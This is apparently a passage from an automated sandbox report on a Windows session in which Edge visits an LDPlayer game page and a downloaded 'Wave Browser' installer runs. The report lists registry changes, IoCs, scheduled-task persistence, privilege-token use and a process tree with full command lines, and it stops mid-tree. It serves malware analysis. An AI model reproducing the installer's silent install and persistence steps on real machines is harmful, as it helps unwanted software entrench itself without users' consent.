SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{617E37E1-AC79-4162-BACC-C797A1D31D3E}\ = "IGoogleUpdate" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID\{F87D77DF-DEF2-4294-9F4B-A92E5A6725DE}\InprocServer32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E44DDEE0-3097-499E-9DD5-7D5D5DCC401D}\NumMethods\ = "8" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WOW6432Node\CLSID\{30FB944E-9455-49DD-81C6-7542E47AA3E7}\ProgID\ = "WavesorSWUpdater.Update3WebUser.1.0" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{3BE77C6E-0029-4F24-B677-32C9E15CD8F1}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\WavesorSWUpdater.Update3COMClassUser.1.0\ = "Update3COMClass" SWUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{E4E159E0-7B9C-4D75-AC11-A80628173DE3}\ = "IRegistrationUpdateHook" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Interface\{DDF98EF0-2728-4A8D-8B0F-32627DC56437}\NumMethods\ = "24" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\.shtml setup.exe -
NTFS ADS 12 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 973247.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 419687.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 465097.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 377560.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 341132.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 514035.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 751936.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 891194.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 298985.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 821974.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 998471.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe\:SmartScreen:$DATA Process not Found -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10108 Process not Found -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2420 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4560 msedge.exe 4560 msedge.exe 1844 msedge.exe 1844 msedge.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 5860 identity_helper.exe 5860 identity_helper.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 4324 msedge.exe 4324 msedge.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 5664 SWUpdater.exe 5664 SWUpdater.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3184 taskmgr.exe 9912 Process not Found 1844 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 5428 wavebrowser.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3184 taskmgr.exe Token: SeSystemProfilePrivilege 3184 taskmgr.exe Token: SeCreateGlobalPrivilege 3184 taskmgr.exe Token: 33 5160 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5160 AUDIODG.EXE Token: SeDebugPrivilege 3160 Wave Browser.exe Token: SeDebugPrivilege 868 Wave Browser.exe Token: SeDebugPrivilege 5664 SWUpdater.exe Token: SeDebugPrivilege 5664 SWUpdater.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe Token: SeCreatePagefilePrivilege 5428 wavebrowser.exe Token: SeShutdownPrivilege 5428 wavebrowser.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 1844 msedge.exe 1844 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe 3184 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1568 firefox.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 1844 msedge.exe 2420 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1844 wrote to memory of 764 1844 msedge.exe 84 PID 1844 wrote to memory of 764 1844 msedge.exe 84 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4404 1844 msedge.exe 85 PID 1844 wrote to memory of 4560 1844 msedge.exe 86 PID 1844 wrote to memory of 4560 1844 msedge.exe 86 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 PID 1844 wrote to memory of 2120 1844 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.ldplayer.net/games/among-us-on-pc.html1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa527746f8,0x7ffa52774708,0x7ffa527747182⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:22⤵PID:4404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:82⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:3468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:12⤵PID:3796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:12⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:12⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:12⤵PID:1928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7152 /prefetch:82⤵PID:5708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7152 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:12⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:12⤵PID:5172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6476 /prefetch:82⤵PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:12⤵PID:5448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6768 /prefetch:82⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7272 /prefetch:82⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4324
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe"C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4008 -
